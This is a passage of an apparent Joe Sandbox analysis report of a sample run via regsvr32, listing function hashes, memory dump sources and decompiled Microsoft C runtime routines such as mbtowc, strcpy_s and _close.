                                                                                        • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                                                        • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 83251219-3442986447
                                                                                        • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                        • Instruction ID: db55a7b1c5e8f8ba017cd25dadef4e5d7f369c86b420bd695ab78b9edef6402a
                                                                                        • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                        • Instruction Fuzzy Hash: 49F1D87260CBC186E7B18B25E8947AEB7E4F384785F604125EACD87AA9DB7DD540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                                                        • API String ID: 2123368286-2816485415
                                                                                        • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                        • Instruction ID: e049fe60bfe8b909c44bc6b291fed8ca56badbc40bca4273ec712473172458ea
                                                                                        • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                        • Instruction Fuzzy Hash: 72617B71A1C6468AE7909B28EC4176E73E1F780354F608225E6DE57AF5D77EE440CF02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __doserrno$_invalid_parameter
                                                                                        • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                                                        • API String ID: 747159061-2992490823
                                                                                        • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                        • Instruction ID: a54d4eac887ae6c515e29e2b1085f50a353430ba1ba5378d93a4f051e541eccc
                                                                                        • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                        • Instruction Fuzzy Hash: 38515C71A186468AE7909B29EC8176E73E2F780758F608225E6DD476F5D77EE400CF02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                                                        • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 1328470723-1899493600
                                                                                        • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                        • Instruction ID: 35246ecaaba514364cbfc4328619620b6524a9f29049ac5612c0b139108759f7
                                                                                        • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                        • Instruction Fuzzy Hash: 41C10D72A0CAC286E7B19B55E8407AFB7E0F384346F600125E6C987AE9DB7DE444CF10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2352934578-0
                                                                                        • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                        • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                                                                        • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                        • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                                                        • API String ID: 2123368286-322314505
                                                                                        • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                        • Instruction ID: 6d338823bc0f2b3e781b71aef6a49b7720da2244df946e2498ce1ac2f83d5b49
                                                                                        • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                        • Instruction Fuzzy Hash: BE023F32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 1139040907-3988320827
                                                                                        • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                        • Instruction ID: 3e7729e9fa2df8fbd66d26b0c41d9f273e3b14a95de5485bb8cc9613adf332ea
                                                                                        • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                        • Instruction Fuzzy Hash: 48F1E972A0CAC18AE7A08B55E8407AFB7E0F385746F600126E6CD87AA9DB7DD444CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                                                        • API String ID: 2123368286-3300880850
                                                                                        • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                        • Instruction ID: aecfb8002ddf48ca923cbb39b51a8433fc62f52c2bad17b92f015e95501d1b82
                                                                                        • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                        • Instruction Fuzzy Hash: 16C15B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA9DF7ED084CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter
                                                                                        • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                                                        • API String ID: 2123368286-3045918802
                                                                                        • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                        • Instruction ID: 2d2c21a115c33e05293010ad7c3501076a31da08f4abba68164bfd8b1e70ad26
                                                                                        • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                        • Instruction Fuzzy Hash: 9EC14D3190CB8A85EBA08B28E84436EA3E0F386794F614535D6DE43BB5DF7ED448CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 15%
                                                                                        			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                                                                        				intOrPtr _v24;
                                                                                        				long long _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				intOrPtr _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				char _v88;
                                                                                        				intOrPtr _v96;
                                                                                        				long long _v104;
                                                                                        				void* _t80;
                                                                                        				void* _t81;
                                                                                        				void* _t89;
                                                                                        				void* _t92;
                                                                                        				intOrPtr _t102;
                                                                                        				intOrPtr* _t136;
                                                                                        				intOrPtr* _t137;
                                                                                        				intOrPtr* _t139;
                                                                                        				signed char* _t141;
                                                                                        				intOrPtr* _t142;
                                                                                        				intOrPtr* _t143;
                                                                                        				intOrPtr* _t144;
                                                                                        				intOrPtr* _t148;
                                                                                        				intOrPtr* _t149;
                                                                                        
                                                                                        				_a32 = __r9;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __rdx;
                                                                                        				_a8 = __rcx;
                                                                                        				if (_a16 == 0) goto 0xf9d3f031;
                                                                                        				if (_a24 != 0) goto 0xf9d3f038;
                                                                                        				goto 0xf9d3f31a;
                                                                                        				_t136 = _a16;
                                                                                        				if ( *_t136 != 0) goto 0xf9d3f066;
                                                                                        				if (_a8 == 0) goto 0xf9d3f05f;
                                                                                        				 *_a8 = 0;
                                                                                        				goto 0xf9d3f31a;
                                                                                        				0xf9d266b0();
                                                                                        				_t80 = E000007FE7FEF9D26840(0,  &_v88);
                                                                                        				_t137 =  *_t136;
                                                                                        				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
                                                                                        				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
                                                                                        				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
                                                                                        				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                                                                        				_v104 = _t139;
                                                                                        				r9d = 0;
                                                                                        				r8d = 0x47;
                                                                                        				0xf9d2b3b0();
                                                                                        				if (_t81 != 1) goto 0xf9d3f0d2;
                                                                                        				asm("int3");
                                                                                        				E000007FE7FEF9D26840(0,  &_v88);
                                                                                        				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
                                                                                        				if (_a8 == 0) goto 0xf9d3f106;
                                                                                        				_t141 = _a16;
                                                                                        				 *_a8 =  *_t141 & 0x000000ff;
                                                                                        				_v56 = 1;
                                                                                        				E000007FE7FEF9D26800( &_v88);
                                                                                        				goto 0xf9d3f31a;
                                                                                        				E000007FE7FEF9D26840(_v56,  &_v88);
                                                                                        				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
                                                                                        				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
                                                                                        				_t142 =  *_t141;
                                                                                        				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
                                                                                        				E000007FE7FEF9D26840(_t89,  &_v88);
                                                                                        				_t143 =  *_t142;
                                                                                        				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
                                                                                        				if (_a8 == 0) goto 0xf9d3f191;
                                                                                        				_v36 = 1;
                                                                                        				goto 0xf9d3f199;
                                                                                        				_v36 = 0;
                                                                                        				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                                                                        				_t144 =  *_t143;
                                                                                        				_v32 = _t144;
                                                                                        				E000007FE7FEF9D26840(_t92,  &_v88);
                                                                                        				_v96 = _v36;
                                                                                        				_v104 = _a8;
                                                                                        				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                                                                        				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
                                                                                        				E000007FE7FEF9D26840(_t94,  &_v88);
                                                                                        				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
                                                                                        				_t148 = _a16;
                                                                                        				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
                                                                                        				0xf9d2ab30();
                                                                                        				 *_t148 = 0x2a;
                                                                                        				_v52 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_v88);
                                                                                        				goto 0xf9d3f31a;
                                                                                        				E000007FE7FEF9D26840(_v52,  &_v88);
                                                                                        				_t149 =  *_t148;
                                                                                        				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                                                                        				E000007FE7FEF9D26800( &_v88);
                                                                                        				_t102 = _v48;
                                                                                        				goto 0xf9d3f310;
                                                                                        				if (_a8 == 0) goto 0xf9d3f28b;
                                                                                        				_v24 = 1;
                                                                                        				goto 0xf9d3f293;
                                                                                        				_v24 = 0;
                                                                                        				E000007FE7FEF9D26840(_t102,  &_v88);
                                                                                        				_v96 = _v24;
                                                                                        				_v104 = _a8;
                                                                                        				r9d = 1;
                                                                                        				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
                                                                                        				0xf9d2ab30();
                                                                                        				 *((intOrPtr*)( *_t149)) = 0x2a;
                                                                                        				_v44 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_v88);
                                                                                        				goto 0xf9d3f31a;
                                                                                        				_v40 = 1;
                                                                                        				E000007FE7FEF9D26800( &_v88);
                                                                                        				goto 0xf9d3f31a;
                                                                                        				return E000007FE7FEF9D26800( &_v88);
                                                                                        			}




























                                                                                        0x7fef9d3f000
                                                                                        0x7fef9d3f005
                                                                                        0x7fef9d3f00a
                                                                                        0x7fef9d3f00f
                                                                                        0x7fef9d3f024
                                                                                        0x7fef9d3f02f
                                                                                        0x7fef9d3f033
                                                                                        0x7fef9d3f038
                                                                                        0x7fef9d3f045
                                                                                        0x7fef9d3f050
                                                                                        0x7fef9d3f05c
                                                                                        0x7fef9d3f061
                                                                                        0x7fef9d3f073
                                                                                        0x7fef9d3f07d
                                                                                        0x7fef9d3f082
                                                                                        0x7fef9d3f08c
                                                                                        0x7fef9d3f093
                                                                                        0x7fef9d3f0a2
                                                                                        0x7fef9d3f0a4
                                                                                        0x7fef9d3f0ab
                                                                                        0x7fef9d3f0b0
                                                                                        0x7fef9d3f0b3
                                                                                        0x7fef9d3f0c5
                                                                                        0x7fef9d3f0cd
                                                                                        0x7fef9d3f0cf
                                                                                        0x7fef9d3f0d7
                                                                                        0x7fef9d3f0e3
                                                                                        0x7fef9d3f0ee
                                                                                        0x7fef9d3f0f0
                                                                                        0x7fef9d3f103
                                                                                        0x7fef9d3f106
                                                                                        0x7fef9d3f113
                                                                                        0x7fef9d3f11c
                                                                                        0x7fef9d3f126
                                                                                        0x7fef9d3f140
                                                                                        0x7fef9d3f14b
                                                                                        0x7fef9d3f150
                                                                                        0x7fef9d3f15a
                                                                                        0x7fef9d3f165
                                                                                        0x7fef9d3f16a
                                                                                        0x7fef9d3f17a
                                                                                        0x7fef9d3f185
                                                                                        0x7fef9d3f187
                                                                                        0x7fef9d3f18f
                                                                                        0x7fef9d3f191
                                                                                        0x7fef9d3f19e
                                                                                        0x7fef9d3f1a3
                                                                                        0x7fef9d3f1a6
                                                                                        0x7fef9d3f1b0
                                                                                        0x7fef9d3f1bc
                                                                                        0x7fef9d3f1c8
                                                                                        0x7fef9d3f1d2
                                                                                        0x7fef9d3f1f1
                                                                                        0x7fef9d3f1f8
                                                                                        0x7fef9d3f20f
                                                                                        0x7fef9d3f211
                                                                                        0x7fef9d3f21f
                                                                                        0x7fef9d3f221
                                                                                        0x7fef9d3f226
                                                                                        0x7fef9d3f22c
                                                                                        0x7fef9d3f239
                                                                                        0x7fef9d3f242
                                                                                        0x7fef9d3f24c
                                                                                        0x7fef9d3f251
                                                                                        0x7fef9d3f25a
                                                                                        0x7fef9d3f263
                                                                                        0x7fef9d3f268
                                                                                        0x7fef9d3f271
                                                                                        0x7fef9d3f27f
                                                                                        0x7fef9d3f281
                                                                                        0x7fef9d3f289
                                                                                        0x7fef9d3f28b
                                                                                        0x7fef9d3f298
                                                                                        0x7fef9d3f2a4
                                                                                        0x7fef9d3f2b0
                                                                                        0x7fef9d3f2b5
                                                                                        0x7fef9d3f2d3
                                                                                        0x7fef9d3f2d5
                                                                                        0x7fef9d3f2da
                                                                                        0x7fef9d3f2e0
                                                                                        0x7fef9d3f2ed
                                                                                        0x7fef9d3f2f6
                                                                                        0x7fef9d3f2f8
                                                                                        0x7fef9d3f305
                                                                                        0x7fef9d3f30e
                                                                                        0x7fef9d3f321

                                                                                        APIs
                                                                                        Strings
                                                                                        • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                                                                        • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                                                        • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                                                        • API String ID: 3162172745-1617866167
                                                                                        • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                        • Instruction ID: 684ba7971de88d1067c150b2dc8aa1ec623b130c6e00156a0851ae80eca3a1f6
                                                                                        • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                        • Instruction Fuzzy Hash: A9913C32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                                                        • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                        • API String ID: 792801276-1329727594
                                                                                        • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                        • Instruction ID: 74944a5c68176a92a31906070f765b18f74d9586b7891cebb3d67554b9ce35f5
                                                                                        • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                        • Instruction Fuzzy Hash: B2613872A0D7C186E7B49B10E8907AEBBA0F784740FA18126D6CD47BA9DB3ED404CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: __doserrno$_invalid_parameter
                                                                                        • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                                                        • API String ID: 747159061-3177431134
                                                                                        • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                        • Instruction ID: efe890aaf17933dee885bd0091a5358479214bdc632742ad2579ba78141b5705
                                                                                        • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                        • Instruction Fuzzy Hash: 25518C32A1864A86F7909B59E88076EB3E1F3807A5F609321E1ED077F5D7BED500CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
